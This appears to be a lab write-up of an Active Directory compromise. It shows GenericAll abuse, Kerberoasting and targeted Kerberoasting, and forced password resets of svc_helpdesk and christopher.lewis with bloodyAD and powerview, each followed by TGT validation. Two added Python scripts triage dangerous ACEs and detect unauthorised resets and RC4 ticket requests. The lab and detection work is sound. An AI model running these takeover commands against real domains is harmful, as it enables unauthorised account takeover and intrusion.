GenericAll
During the BloodHound enumeration, all 3 compromised accounts, being part of the employees group, have GenericAll access to 4 users in the helpdesk group. The helpdesk group in turn has GenericAll access to the christopher.lewis user, who has a transitive membership in the Remote Management Users group, allowing direct access to the nagoya.nagoya-industries.com host via WinRM.
svc_helpdesk
The svc_helpdesk account is the preferred target as it is a service account with an SPN. The account is also kerberoastable and was successfully kerberoasted, although the TGS-REP hash couldn't be cracked.
While there are many ways to compromise the target user from this point, since the GenericAll privilege grants complete control over the user object, a password reset can be used to take over the target user object.
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nagoya]
└─$ KRB5CCNAME=andrea.hayes@nagoya.nagoya-industries.com.ccache powerview 'NAGOYA-INDUSTRIES.COM/@nagoya.nagoya-industries.com' --no-pass -k -ns $IP --use-ldaps --dc-ip $IP -q 'Get-DomainObjectAcl -Identity svc_helpdesk -ResolveGUIDs -Where "SecurityIdentifier contains employees"'
Logging directory is set to /home/kali/.powerview/logs/nagoya-industries-nagoya.nagoya-industries.com
[2025-04-23 19:55:34] [Storage] Using cache directory: /home/kali/.powerview/storage/ldap_cache
ObjectDN : CN=svc_helpdesk,OU=helpdesk,DC=nagoya-industries,DC=com
ObjectSID : S-1-5-21-1969309164-1513403977-1686805993-1104
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERITED_ACE
AccessMask : CreateChild, DeleteChild
ObjectAceFlags : ACE_OBJECT_TYPE_PRESENT
ObjectAceType : User
InheritanceType : None
SecurityIdentifier : NAGOYA-INDUSTRIES\employees
ObjectDN : CN=svc_helpdesk,OU=helpdesk,DC=nagoya-industries,DC=com
ObjectSID : S-1-5-21-1969309164-1513403977-1686805993-1104
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERITED_ACE
AccessMask : ControlAccess, CreateChild, DeleteChild, ReadProperty, WriteProperty, Self
ObjectAceFlags : ACE_INHERITED_OBJECT_TYPE_PRESENT
InheritanceType : User
SecurityIdentifier : NAGOYA-INDUSTRIES\employees
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nagoya]
└─$ KRB5CCNAME=andrea.hayes@nagoya.nagoya-industries.com.ccache bloodyAD -d NAGOYA-INDUSTRIES.COM -k --host nagoya.nagoya-industries.com get writable
distinguishedName: CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=nagoya-industries,DC=com
permission: WRITE
distinguishedName: CN=svc_helpdesk,OU=helpdesk,DC=nagoya-industries,DC=com
permission: CREATE_CHILD; WRITE
OWNER: WRITE
DACL: WRITE
distinguishedName: CN=Andrea Hayes,OU=employees,DC=nagoya-industries,DC=com
permission: WRITE
distinguishedName: OU=helpdesk,DC=nagoya-industries,DC=com
permission: CREATE_CHILD
distinguishedName: CN=Iain White,OU=helpdesk,DC=nagoya-industries,DC=com
permission: CREATE_CHILD; WRITE
OWNER: WRITE
DACL: WRITE
distinguishedName: CN=Joanna Wood,OU=helpdesk,DC=nagoya-industries,DC=com
permission: CREATE_CHILD; WRITE
OWNER: WRITE
DACL: WRITE
distinguishedName: CN=Bethan Webster,OU=helpdesk,DC=nagoya-industries,DC=com
permission: CREATE_CHILD; WRITE
OWNER: WRITE
DACL: WRITE
This can be confirmed using PowerView and bloodyAD.
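The ACE listings above can be triaged mechanically rather than read by eye. The following Python script is an added example (it is not part of the original writeup, nor code from the PowerView or bloodyAD projects): it parses PowerView-style Get-DomainObjectAcl text output into one record per ACE, skips ACEs held by a constructed allowlist of privileged principals, and flags every remaining allow-ACE whose AccessMask carries a right that lets the holder take over the object (ControlAccess covers the User-Force-Change-Password extended right used for the reset below; WriteProperty covers servicePrincipalName, which targeted Kerberoasting needs). An ACE scoped to a single attribute via ACE_OBJECT_TYPE_PRESENT is only flagged when that attribute is itself dangerous. The sample input embeds the two svc_helpdesk ACEs shown above plus two constructed ACEs for contrast; the PRIVILEGED_PRINCIPALS and DANGEROUS_TARGETS sets are assumptions a defender would tune.

```python
import re

# Rights that, unscoped, give control of a user object (names as PowerView prints them).
TAKEOVER_RIGHTS = {"GenericAll", "GenericWrite", "WriteProperty", "WriteDacl",
                   "WriteOwner", "ControlAccess", "AllExtendedRights"}

# Attributes / extended rights that give control even when the ACE is scoped to
# just that one GUID. Normalised (lowercase, non-alphanumerics removed) so that
# PowerView's "Service-Principal-Name" and LDAP's "servicePrincipalName" match.
# Assumed list; extend for your environment.
DANGEROUS_TARGETS = {"serviceprincipalname", "msdskeycredentiallink",
                     "scriptpath", "userforcechangepassword"}

# Assumed allowlist: principals expected to hold control rights over users.
PRIVILEGED_PRINCIPALS = {"Domain Admins", "Enterprise Admins", "Administrators",
                         "Account Operators", "SYSTEM", "SELF"}

# Constructed sample: the two ACEs for svc_helpdesk copied from the powerview
# output above, plus two made-up scoped ACEs (one harmless, one dangerous).
SAMPLE_ACL = r"""
ObjectDN : CN=svc_helpdesk,OU=helpdesk,DC=nagoya-industries,DC=com
ObjectSID : S-1-5-21-1969309164-1513403977-1686805993-1104
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERITED_ACE
AccessMask : CreateChild, DeleteChild
ObjectAceFlags : ACE_OBJECT_TYPE_PRESENT
ObjectAceType : User
InheritanceType : None
SecurityIdentifier : NAGOYA-INDUSTRIES\employees
ObjectDN : CN=svc_helpdesk,OU=helpdesk,DC=nagoya-industries,DC=com
ObjectSID : S-1-5-21-1969309164-1513403977-1686805993-1104
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERITED_ACE
AccessMask : ControlAccess, CreateChild, DeleteChild, ReadProperty, WriteProperty, Self
ObjectAceFlags : ACE_INHERITED_OBJECT_TYPE_PRESENT
InheritanceType : User
SecurityIdentifier : NAGOYA-INDUSTRIES\employees
ObjectDN : CN=svc_helpdesk,OU=helpdesk,DC=nagoya-industries,DC=com
ObjectSID : S-1-5-21-1969309164-1513403977-1686805993-1104
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : CONTAINER_INHERIT_ACE
AccessMask : WriteProperty
ObjectAceFlags : ACE_OBJECT_TYPE_PRESENT
ObjectAceType : Display-Name
SecurityIdentifier : NAGOYA-INDUSTRIES\Domain Users
ObjectDN : CN=svc_helpdesk,OU=helpdesk,DC=nagoya-industries,DC=com
ObjectSID : S-1-5-21-1969309164-1513403977-1686805993-1104
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : CONTAINER_INHERIT_ACE
AccessMask : WriteProperty
ObjectAceFlags : ACE_OBJECT_TYPE_PRESENT
ObjectAceType : Service-Principal-Name
SecurityIdentifier : NAGOYA-INDUSTRIES\helpdesk
"""


def _norm(name):
    return re.sub(r"[^a-z0-9]", "", name.lower())


def parse_aces(text):
    """Split PowerView's 'Key : Value' listing into one dict per ACE (a new ACE starts at each ObjectDN)."""
    aces, current = [], {}
    for line in text.splitlines():
        key, sep, value = line.partition(":")
        if not sep:
            continue
        key, value = key.strip(), value.strip()
        if key == "ObjectDN" and current:
            aces.append(current)
            current = {}
        current[key] = value
    if current:
        aces.append(current)
    return aces


def takeover_rights(ace):
    """Rights in this allow-ACE that let the principal take over the object."""
    if not ace.get("ACEType", "").startswith("ACCESS_ALLOWED"):
        return set()
    rights = {r.strip() for r in ace.get("AccessMask", "").split(",")} & TAKEOVER_RIGHTS
    flags = {f.strip() for f in ace.get("ObjectAceFlags", "").split(",")}
    # Scoped to one attribute / extended right: only dangerous if that target is.
    if "ACE_OBJECT_TYPE_PRESENT" in flags and _norm(ace.get("ObjectAceType", "")) not in DANGEROUS_TARGETS:
        return set()
    return rights


def triage(text, privileged=PRIVILEGED_PRINCIPALS):
    """Return the non-privileged principals that can take over each object."""
    findings = []
    for ace in parse_aces(text):
        principal = ace.get("SecurityIdentifier", "")
        if principal.split("\\")[-1] in privileged:
            continue
        rights = takeover_rights(ace)
        if rights:
            findings.append({"object": ace["ObjectDN"], "principal": principal,
                             "rights": sorted(rights),
                             "inherited": "INHERITED_ACE" in ace.get("ACEFlags", "")})
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_ACL):
        where = "inherited" if f["inherited"] else "explicit"
        print(f"{f['principal']} -> {f['object']}: {', '.join(f['rights'])} ({where})")
```

The inherited flag matters for remediation: the ACE on svc_helpdesk is inherited from the helpdesk OU, so fixing it on the user alone leaves the other three helpdesk users (and anything created in that OU later) exposed; the fix belongs on the OU's DACL.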
Password Reset (svc_helpdesk)
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nagoya]
└─$ KRB5CCNAME=andrea.hayes@nagoya.nagoya-industries.com.ccache bloodyAD -d NAGOYA-INDUSTRIES.COM -k --host nagoya.nagoya-industries.com set password svc_helpdesk Qwer1234
[+] Password changed successfully!
The password of the svc_helpdesk account has been reset to Qwer1234.
Validation (svc_helpdesk)
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nagoya]
└─$ impacket-getTGT NAGOYA-INDUSTRIES.COM/svc_helpdesk@nagoya.nagoya-industries.com -dc-ip $IP
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
Password: Qwer1234
[*] Saving ticket in svc_helpdesk@nagoya.nagoya-industries.com.ccache
Validated: TGT generated for the svc_helpdesk account.
christopher.lewis
As detailed above, the christopher.lewis user is the preferred target due to his transitive membership in the Remote Management Users group.
While there are many ways to compromise the target user from this point, since the GenericAll privilege grants complete control over the user object, a password reset can be used to take over the target user object.
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nagoya]
└─$ KRB5CCNAME=svc_helpdesk@nagoya.nagoya-industries.com.ccache powerview NAGOYA-INDUSTRIES.COM/@nagoya.nagoya-industries.com --no-pass -k -ns $IP --use-ldaps --dc-ip $IP -q 'Get-DomainObjectAcl -Identity christopher.lewis -ResolveGUIDs -Where "SecurityIdentifier contains helpdesk"'
Logging directory is set to /home/kali/.powerview/logs/nagoya-industries-nagoya.nagoya-industries.com
[2025-04-23 20:02:32] [Storage] Using cache directory: /home/kali/.powerview/storage/ldap_cache
ObjectDN : CN=Christopher Lewis,OU=employees,DC=nagoya-industries,DC=com
ObjectSID : S-1-5-21-1969309164-1513403977-1686805993-1132
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERITED_ACE
AccessMask : CreateChild, DeleteChild
ObjectAceFlags : ACE_OBJECT_TYPE_PRESENT
ObjectAceType : User
InheritanceType : None
SecurityIdentifier : NAGOYA-INDUSTRIES\helpdesk
ObjectDN : CN=Christopher Lewis,OU=employees,DC=nagoya-industries,DC=com
ObjectSID : S-1-5-21-1969309164-1513403977-1686805993-1132
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERITED_ACE
AccessMask : ControlAccess, CreateChild, DeleteChild, ReadProperty, WriteProperty, Self
ObjectAceFlags : ACE_INHERITED_OBJECT_TYPE_PRESENT
InheritanceType : User
SecurityIdentifier : NAGOYA-INDUSTRIES\helpdesk
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nagoya]
└─$ KRB5CCNAME=svc_helpdesk@nagoya.nagoya-industries.com.ccache bloodyAD -d NAGOYA-INDUSTRIES.COM -k --host nagoya.nagoya-industries.com get writable
[...REDACTED...]
distinguishedName: CN=Christopher Lewis,OU=employees,DC=nagoya-industries,DC=com
permission: CREATE_CHILD; WRITE
OWNER: WRITE
DACL: WRITE
Confirmed
Targeted Kerberoasting
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nagoya]
└─$ KRB5CCNAME=svc_helpdesk@nagoya.nagoya-industries.com.ccache impacket-targetedKerberoast -d NAGOYA-INDUSTRIES.COM --no-pass -k --dc-host nagoya.nagoya-industries.com --dc-ip $IP --request-user christopher.lewis
[*] Starting kerberoast attacks
[*] Attacking user (christopher.lewis)
[+] Printing hash for (Christopher.Lewis)
$krb5tgs$23$*Christopher.Lewis$NAGOYA-INDUSTRIES.COM$NAGOYA-INDUSTRIES.COM/Christopher.Lewis*$c46c8e24b2918320e08776e01c2e69fc$[...REDACTED...]
I wanted to preserve the user's original password, so I opted for targeted Kerberoasting. Targeted Kerberoasting was successful; however, the TGS-REP hash is uncrackable.
Password Reset (christopher.lewis)
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nagoya]
└─$ KRB5CCNAME=svc_helpdesk@nagoya.nagoya-industries.com.ccache powerview NAGOYA-INDUSTRIES.COM/@nagoya.nagoya-industries.com --no-pass -k -ns $IP --use-ldaps --dc-ip $IP -q 'Set-DomainUserPassword -Identity christopher.lewis -AccountPassword Qwer1234'
Logging directory is set to /home/kali/.powerview/logs/nagoya-industries-nagoya.nagoya-industries.com
[2025-04-23 20:22:35] [Storage] Using cache directory: /home/kali/.powerview/storage/ldap_cache
[2025-04-23 20:22:35] [Set-DomainUserPassword] Principal CN=Christopher Lewis,OU=employees,DC=nagoya-industries,DC=com found in domain
[2025-04-23 20:22:35] [Set-DomainUserPassword] Password has been successfully changed for user Christopher.Lewis
[2025-04-23 20:22:35] Password changed for christopher.lewis
Password reset successful for the christopher.lewis user.
Validation (christopher.lewis)
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nagoya]
└─$ impacket-getTGT NAGOYA-INDUSTRIES.COM/christopher.lewis@nagoya.nagoya-industries.com -dc-ip $IP
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
Password: Qwer1234
[*] Saving ticket in christopher.lewis@nagoya.nagoya-industries.com.ccache
Validated: TGT generated for the christopher.lewis user.
Given that the user is part of the Remote Management Users group, I can WinRM directly to the DC host.
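From the defender's side, each step of the chain above (the Kerberoasting of svc_helpdesk, the targeted Kerberoasting of christopher.lewis, and the two password resets) leaves a trace in the domain controller's Security log. The following Python script is an added example, not part of the original writeup: it runs two detections over constructed, already-parsed event records. The first flags Event ID 4724 (a password reset performed on another account) where the subject is not on an authorised list. The second flags Event ID 4769 service ticket requests with RC4 encryption (TicketEncryptionType 0x17) for user accounts, and raises the severity to high when a 5136 directory-change event shows servicePrincipalName being added to that same account shortly before, which is exactly what targeted Kerberoasting does to an account that had no SPN. The event records, the DN_TO_SAM lookup and the AUTHORISED_RESETTERS allowlist are assumptions; 5136 is only produced when Audit Directory Service Changes is enabled and the objects carry a SACL.

```python
from datetime import datetime

# Constructed sample: Security-log events as a SIEM would present them after
# parsing (field names simplified). Account names mirror the writeup; the
# timestamps and the svc_sql / helpdesk_admin / joanna.wood entries are made up.
SAMPLE_EVENTS = [
    # Kerberoast of svc_helpdesk from a compromised employee: RC4 TGS request
    {"time": "2025-04-23T19:40:00", "id": 4769, "subject": "andrea.hayes",
     "service": "svc_helpdesk", "etype": "0x17"},
    # Password reset of svc_helpdesk by a plain employee (4724 = reset of another
    # account; 4723 would be a user changing their own password)
    {"time": "2025-04-23T19:58:00", "id": 4724, "subject": "andrea.hayes",
     "target": "svc_helpdesk"},
    # Targeted Kerberoasting precursor: an SPN is written onto a user object
    {"time": "2025-04-23T20:10:01", "id": 5136, "subject": "svc_helpdesk",
     "object": "CN=Christopher Lewis,OU=employees,DC=nagoya-industries,DC=com",
     "attribute": "servicePrincipalName", "operation": "add"},
    # ... followed seconds later by an RC4 service ticket request for that user
    {"time": "2025-04-23T20:10:04", "id": 4769, "subject": "svc_helpdesk",
     "service": "christopher.lewis", "etype": "0x17"},
    # Benign: AES ticket request for a genuine service account
    {"time": "2025-04-23T20:11:00", "id": 4769, "subject": "andrea.hayes",
     "service": "svc_sql", "etype": "0x12"},
    # Password reset of christopher.lewis by svc_helpdesk
    {"time": "2025-04-23T20:22:35", "id": 4724, "subject": "svc_helpdesk",
     "target": "christopher.lewis"},
    # Benign: an authorised helpdesk administrator resetting a user
    {"time": "2025-04-23T20:25:00", "id": 4724, "subject": "helpdesk_admin",
     "target": "joanna.wood"},
]

# Constructed lookup from distinguishedName to sAMAccountName: 5136 reports the
# DN while 4769 reports the account name. A real pipeline resolves this from AD.
DN_TO_SAM = {
    "CN=Christopher Lewis,OU=employees,DC=nagoya-industries,DC=com": "christopher.lewis",
}

# Assumed allowlist of principals permitted to reset other users' passwords.
AUTHORISED_RESETTERS = {"helpdesk_admin"}


def _ts(event):
    return datetime.fromisoformat(event["time"])


def detect_delegated_resets(events, authorised=AUTHORISED_RESETTERS):
    """4724 password resets of another account by a principal outside the allowlist.

    A ControlAccess / GenericAll holder resetting a password (the bloodyAD and
    powerview steps above) shows up here with subject != target.
    """
    return [
        (e["subject"], e["target"])
        for e in events
        if e["id"] == 4724
        and e["subject"].lower() != e["target"].lower()
        and e["subject"] not in authorised
    ]


def detect_kerberoast(events, dn_to_sam=DN_TO_SAM, window_seconds=900):
    """RC4 (0x17) service ticket requests for user accounts.

    Medium severity on its own; high when a 5136 event shows an SPN being added to
    that same user within window_seconds beforehand (targeted Kerberoasting).
    """
    spn_added_at = {}
    for e in events:
        if (e["id"] == 5136 and e.get("attribute", "").lower() == "serviceprincipalname"
                and e.get("operation") == "add"):
            sam = dn_to_sam.get(e["object"])
            if sam:
                spn_added_at[sam.lower()] = _ts(e)

    findings = []
    for e in events:
        if e["id"] != 4769 or e["etype"].lower() != "0x17":
            continue
        account = e["service"].lower()
        if account.endswith("$"):  # machine accounts have random passwords; not roastable
            continue
        added = spn_added_at.get(account)
        if added is not None and 0 <= (_ts(e) - added).total_seconds() <= window_seconds:
            severity, reason = "high", "RC4 TGS request shortly after an SPN was added to this user"
        else:
            severity, reason = "medium", "RC4 TGS request for a user account"
        findings.append({"account": account, "requester": e["subject"],
                         "severity": severity, "reason": reason})
    return findings


if __name__ == "__main__":
    for subject, target in detect_delegated_resets(SAMPLE_EVENTS):
        print(f"[reset] {subject} reset the password of {target}")
    for f in detect_kerberoast(SAMPLE_EVENTS):
        print(f"[{f['severity']}] {f['requester']} -> {f['account']}: {f['reason']}")
```

Both resets in the chain surface because the subject is neither the target nor an authorised resetter, which is the property worth alerting on rather than the tool used (bloodyAD over LDAP and powerview's Set-DomainUserPassword both end up as 4724 on the DC). The RC4 rule alone is noisy in domains that still allow RC4 service tickets; the SPN-write correlation is what separates the targeted case from ordinary Kerberoasting of existing service accounts.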